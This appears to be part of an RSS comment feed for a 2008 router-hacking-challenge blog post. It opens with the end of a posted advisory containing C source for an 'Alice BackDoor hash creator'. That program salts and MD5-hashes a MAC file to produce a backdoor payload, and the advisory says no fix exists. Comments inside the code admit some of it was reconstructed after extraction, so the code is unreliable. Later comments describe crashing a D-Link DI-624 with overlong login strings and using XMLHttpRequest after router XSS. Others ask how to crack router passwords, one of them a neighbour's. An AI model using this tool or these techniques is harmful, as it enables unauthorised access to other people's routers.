    if( ctx-&gt;total[0] &lt; length ) ctx-&gt;total[1]++;

    if( left &amp;&amp; length &gt;= fill )
    {
        memcpy( (void *) (ctx-&gt;buffer + left),
                (void *) input, fill );
        md5_process( ctx, ctx-&gt;buffer );
        length -= fill;
        input  += fill;
        left = 0;
    }

    while( length &gt;= 64 )
    {
        md5_process( ctx, input );
        length -= 64;
        input  += 64;
    }

    if( length )
    {
        memcpy( (void *) (ctx-&gt;buffer + left),
                (void *) input, length );
    }
}

static uint8 md5_padding[64] =
{
 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

void md5_finish( md5_context *ctx, uint8 digest[16] )
{
    uint32 last, padn;
    uint32 high, low;
    uint8 msglen[8];

    /* bit length of the message, then padding and final digest (restored from Devine's md5.c) */
    high = ( ctx-&gt;total[0] &gt;&gt; 29 )
         | ( ctx-&gt;total[1] &lt;&lt;  3 );
    low  = ( ctx-&gt;total[0] &lt;&lt;  3 );

    PUT_UINT32( low,  msglen, 0 );
    PUT_UINT32( high, msglen, 4 );

    last = ctx-&gt;total[0] &amp; 0x3F;
    padn = ( last &lt; 56 ) ? ( 56 - last ) : ( 120 - last );

    md5_update( ctx, md5_padding, padn );
    md5_update( ctx, msglen, 8 );

    PUT_UINT32( ctx-&gt;state[0], digest,  0 );
    PUT_UINT32( ctx-&gt;state[1], digest,  4 );
    PUT_UINT32( ctx-&gt;state[2], digest,  8 );
    PUT_UINT32( ctx-&gt;state[3], digest, 12 );
}

//#ifdef TEST

/*
 * those are the standard RFC 1321 test vectors
 */

static char *msg[] =
{
    "",
    "a",
    "abc",
    "message digest",
    "abcdefghijklmnopqrstuvwxyz",
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
    "12345678901234567890123456789012345678901234567890123456789012" \
        "345678901234567890"
};

static char *val[] =
{
    "d41d8cd98f00b204e9800998ecf8427e",
    "0cc175b9c0f1b6a831c399e269772661",
    "900150983cd24fb0d6963f7d28e17f72",
    "f96b697d7cb7938d525a2f31aaf161d0",
    "c3fcd3d76192e4007dfb496cca67e13b",
    "d174ab98d277d9f5a5611c2c9f419d9f",
    "57edf4a22be3c955ac49da2e2107b67a"
};

static char saltOrig[] =
{0x04, 0x07, 0x67, 0x10, 0x02, 0x81, 0xFA, 0x66, 0x11, 0x41, 0x68, 0x11, 0x17, 0x01, 0x05, 0x22, 0x71, 0x04, 0x10, 0x33};

int main( int argc, char *argv[] )
{
    FILE *f;
    int i, j;
    char output[33];
    md5_context ctx;
    unsigned char buf[1000];
    unsigned char md5sum[16];
	unsigned char salt[20];

	printf( "****************************\n");
	printf( "Alice BackDoor hash creator \n");
	printf( "by saxdax and drPepperOne   \n");
	printf( "****************************\n\n");

	/* argument check, file open and read loop were lost in extraction;
	   reconstructed following the fread loop of Devine's md5.c test main */
	if( argc &lt; 2 )
	{
		printf( "usage: %s &lt;mac.hex&gt;\n", argv[0] );
		return( 1 );
	}

	if( ! ( f = fopen( argv[1], "rb" ) ) )
	{
		printf( "cannot open %s\n", argv[1] );
		return( 1 );
	}

	md5_starts( &amp;ctx );

	while( ( i = fread( buf, 1, sizeof( buf ), f ) ) &gt; 0 )
    {
        md5_update( &amp;ctx, buf, i );
    }

	fclose( f );

	memcpy(salt, saltOrig, 20);

	md5_update( &amp;ctx, salt, 20 );

    md5_finish( &amp;ctx, md5sum );

	printf("Payload is: ");
    for( j = 0; j &lt; 8; j++ )
    {
        printf( "%02x", md5sum[j] );
    }

    return( 0 );
}

#############################################################################################

======
5) Fix
======

Actually at 13 Oct 2008 NO FIX available

#############################################################################################</code></pre>
]]></content:encoded>
	</item>
	<item>
		<title>By: Saqib Lodhi</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-123692</link>
		<dc:creator>Saqib Lodhi</dc:creator>
		<pubDate>Fri, 12 Sep 2008 03:10:46 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-123692</guid>
		<description>How can I read the D-Link DI-604 Config.bin file?</description>
		<content:encoded><![CDATA[<p>How can I read the D-Link DI-604 Config.bin file?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Aubade</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-122468</link>
		<dc:creator>Aubade</dc:creator>
		<pubDate>Fri, 06 Jun 2008 18:12:07 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-122468</guid>
		<description>Hi. Your homepage is very nice! I have an MSI RG60SE wireless router. Unfortunately I can't find the config file, which contains the auth password. :( I tried in the /cgi-bin/ dir (like D-Link routers) but I don't know the cfg file name.

Has anybody hacked an MSI router? If I could get a document file like http://kinqpinz.info/lib/wrt54g/own.txt , it would be great! Maybe an info file like this doesn't exist for the MSI's stuff?

Thx</description>
		<content:encoded><![CDATA[<p>Hi. Your homepage is very nice! I have an MSI RG60SE wireless router. Unfortunately I can&#8217;t find the config file, which contains the auth password. :( I tried in the /cgi-bin/ dir (like D-Link routers) but I don&#8217;t know the cfg file name.</p>
<p>Has anybody hacked an MSI router? If I could get a document file like <a href="http://kinqpinz.info/lib/wrt54g/own.txt" rel="nofollow">http://kinqpinz.info/lib/wrt54g/own.txt</a> , it would be great! Maybe an info file like this doesn&#8217;t exist for the MSI&#8217;s stuff?</p>
<p>Thx</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: defcon</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-122444</link>
		<dc:creator>defcon</dc:creator>
		<pubDate>Wed, 04 Jun 2008 04:58:27 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-122444</guid>
		<description>I've been messing around with my WRT150N, anyone have any luck hacking this?</description>
		<content:encoded><![CDATA[<p>I&#8217;ve been messing around with my WRT150N, anyone have any luck hacking this?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: frodo</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-122399</link>
		<dc:creator>frodo</dc:creator>
		<pubDate>Sun, 01 Jun 2008 09:18:50 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-122399</guid>
		<description>That's great, peeps, but I don't see anybody hacking into the Netgear server 198.168.0.1 CG814WG. Could it be impossible?

And it's not comcast/1234, or superuser/password, or admin admin; I need specifically the one to change advanced settings like the bloody SPI firewall setting in order to play multiplayer in Battlefield 2! Make yourselves useful, will ya :)

Sorry, I got carried away.</description>
		<content:encoded><![CDATA[<p>That&#8217;s great, peeps, but I don&#8217;t see anybody hacking into the Netgear server 198.168.0.1 CG814WG. Could it be impossible?</p>
<p>And it&#8217;s not comcast/1234, or superuser/password, or admin admin; I need specifically the one to change advanced settings like the bloody SPI firewall setting in order to play multiplayer in Battlefield 2! Make yourselves useful, will ya :)</p>
<p>Sorry, I got carried away.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: pdp</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-121655</link>
		<dc:creator>pdp</dc:creator>
		<pubDate>Mon, 12 May 2008 15:06:12 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-121655</guid>
		<description>This is definitely not the place where you should ask these types of questions.</description>
		<content:encoded><![CDATA[<p>This is definitely not the place where you should ask these types of questions.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: john</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-121548</link>
		<dc:creator>john</dc:creator>
		<pubDate>Sun, 11 May 2008 21:23:53 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-121548</guid>
		<description>How to hack a Netgear administrator password?</description>
		<content:encoded><![CDATA[<p>How to hack a Netgear administrator password?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kcir~</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-119854</link>
		<dc:creator>Kcir~</dc:creator>
		<pubDate>Fri, 25 Apr 2008 18:34:42 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-119854</guid>
		<description>I have a config.bin to decrypt the password. Is it possible? http://rapidshare.com/files/110366829/config.bin.html

Thanks.. ;)</description>
		<content:encoded><![CDATA[<p>I have a config.bin to decrypt the password. Is it possible? <a href="http://rapidshare.com/files/110366829/config.bin.html" rel="nofollow">http://rapidshare.com/files/11.....g.bin.html</a></p>
<p>Thanks.. ;)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: jigar</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-118710</link>
		<dc:creator>jigar</dc:creator>
		<pubDate>Sun, 13 Apr 2008 06:17:42 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-118710</guid>
		<description>Hello,
is it possible to hack a router enable password?

I have a router but I can't log in to enable mode,
so give me tips on how I can log in to enable mode
without ROMMON mode.</description>
		<content:encoded><![CDATA[<p>Hello,<br />
is it possible to hack a router enable password?</p>
<p>I have a router but I can&#8217;t log in to enable mode,<br />
so give me tips on how I can log in to enable mode<br />
without ROMMON mode.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Adrian Pastor</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-117802</link>
		<dc:creator>Adrian Pastor</dc:creator>
		<pubDate>Thu, 03 Apr 2008 09:35:57 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-117802</guid>
		<description>Regarding the DI-624 issue: yes, it could be a memory corruption bug (i.e. a buffer overflow), but we shouldn't ignore the possibility of a resource exhaustion issue, since the hardware of some embedded devices is very limited.</description>
		<content:encoded><![CDATA[<p>Regarding the DI-624 issue: yes, it could be a memory corruption bug (i.e. a buffer overflow), but we shouldn&#8217;t ignore the possibility of a resource exhaustion issue, since the hardware of some embedded devices is very limited.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Adrian Pastor</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-117801</link>
		<dc:creator>Adrian Pastor</dc:creator>
		<pubDate>Thu, 03 Apr 2008 09:31:26 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-117801</guid>
		<description>bug: once you have an XSS vulnerability on the router, all you have to do is use the XMLHttpRequest() function in the JavaScript which is executed in the XSS attack:
http://www.quirksmode.org/js/xmlhttp.html

Check out exploit #2 for the BT Home Hub for a real example of how to do this: http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-4/</description>
		<content:encoded><![CDATA[<p>bug: once you have an XSS vulnerability on the router, all you have to do is use the XMLHttpRequest() function in the JavaScript which is executed in the XSS attack:<br />
<a href="http://www.quirksmode.org/js/xmlhttp.html" rel="nofollow">http://www.quirksmode.org/js/xmlhttp.html</a></p>
<p>Check out exploit #2 for the BT Home Hub for a real example of how to do this: <a href="http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-4/" rel="nofollow">http://www.gnucitizen.org/blog.....ome-hub-4/</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: klo</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-117486</link>
		<dc:creator>klo</dc:creator>
		<pubDate>Wed, 26 Mar 2008 10:27:34 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-117486</guid>
		<description>"...it is not very clear from your post but are you saying that the payload has to be 298+ characters long?"

Yeah, for example, a 299 characters long username, or 149 char. long username with 150 char. password.  All characters were in the ASCII range.

I basically came across this "http://secunia.com/advisories/29366/" and wanted to see if the DI-624 is also affected.

I forgot to mention the hardware revision is C3.

It seems like the source code for the device is available at "ftp://ftp.dlink.co.uk/GPL/DI-624_E1_GPL.tgz" but I haven't had time to look over it yet...</description>
		<content:encoded><![CDATA[<p>&#8220;&#8230;it is not very clear from your post but are you saying that the payload has to be 298+ characters long?&#8221;</p>
<p>Yeah, for example, a 299 characters long username, or 149 char. long username with 150 char. password.  All characters were in the ASCII range.</p>
<p>I basically came across this &#8220;http://secunia.com/advisories/29366/&#8221; and wanted to see if the DI-624 is also affected.</p>
<p>I forgot to mention the hardware revision is C3.</p>
<p>It seems like the source code for the device is available at &#8220;ftp://ftp.dlink.co.uk/GPL/DI-624_E1_GPL.tgz&#8221; but I haven&#8217;t had time to look over it yet&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: pdp</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-117467</link>
		<dc:creator>pdp</dc:creator>
		<pubDate>Wed, 26 Mar 2008 07:45:15 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-117467</guid>
		<description>What I believe was happening is that you crashed a CGI script or the actual HTTP server, which upon exit informed the system to reboot. This is a very common behavior among embedded devices. When you see an embedded device rebooting it is definitely because you caused something to do what it was not supposed/designed to - mostly stack or heap overflows. It is not very clear from your post, but are you saying that the payload has to be 298+ characters long?

Exploiting buffer overflows for these devices is as trivial as it can get, but the only thing that is a problem is to either log in to the device and observe any strange messages appearing in the log files which could indicate what the problem is, or attach yourself directly to the device motherboard via JTAG. The second is a bit more complicated. Once we have this information we can verify the exploitability of the problem by mangling with the address space, and if it passes all tests we can sit down and spend time writing payload/shellcode for the affected architecture if there isn't one yet.</description>
		<content:encoded><![CDATA[<p>What I believe was happening is that you crashed a CGI script or the actual HTTP server, which upon exit informed the system to reboot. This is a very common behavior among embedded devices. When you see an embedded device rebooting it is definitely because you caused something to do what it was not supposed/designed to - mostly stack or heap overflows. It is not very clear from your post, but are you saying that the payload has to be 298+ characters long?</p>
<p>Exploiting buffer overflows for these devices is as trivial as it can get, but the only thing that is a problem is to either log in to the device and observe any strange messages appearing in the log files which could indicate what the problem is, or attach yourself directly to the device motherboard via JTAG. The second is a bit more complicated. Once we have this information we can verify the exploitability of the problem by mangling with the address space, and if it passes all tests we can sit down and spend time writing payload/shellcode for the affected architecture if there isn&#8217;t one yet.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: klo</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-117449</link>
		<dc:creator>klo</dc:creator>
		<pubDate>Wed, 26 Mar 2008 04:12:29 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-117449</guid>
		<description>&lt;pre&gt;&lt;code&gt;I can confirm I can make the DI-624 reboot by supplying a username / password string of &#62;298 characters long,
or a combination of the two that adds up to &#62;298 characters, from the authentication dialogue box.&lt;/code&gt;&lt;/pre&gt;</description>
		<content:encoded><![CDATA[<pre><code>I can confirm I can make the DI-624 reboot by supplying a username / password string of &gt;298 characters long,
or a combination of the two that adds up to &gt;298 characters, from the authentication dialogue box.</code></pre>
]]></content:encoded>
	</item>
	<item>
		<title>By: Voice of VOIPSA &#187; Blog Archive &#187; Hacking ZyXEL Gateways</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-117345</link>
		<dc:creator>Voice of VOIPSA &#187; Blog Archive &#187; Hacking ZyXEL Gateways</dc:creator>
		<pubDate>Mon, 24 Mar 2008 18:01:36 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-117345</guid>
		<description>[...] &#8220;So what&#8221; you might say about the security of these types of devices? Well, SANS diary notes some strange things afoot at the Circle K with Dlink and the recent BT Home Hub CVE-2008-1334 router vulnerability. More routers and details at GNU Citizen. [...]</description>
		<content:encoded><![CDATA[<p>[...] &#8220;So what&#8221; you might say about the security of these types of devices? Well, SANS diary notes some strange things afoot at the Circle K with Dlink and the recent BT Home Hub CVE-2008-1334 router vulnerability. More routers and details at GNU Citizen. [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: rebecca</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-116421</link>
		<dc:creator>rebecca</dc:creator>
		<pubDate>Sat, 15 Mar 2008 12:21:03 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-116421</guid>
		<description>I don't have a wireless router; all I want to do is hack my neighbour's router. I need the password to his router.</description>
		<content:encoded><![CDATA[<p>I don&#8217;t have a wireless router; all I want to do is hack my neighbour&#8217;s router. I need the password to his router.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
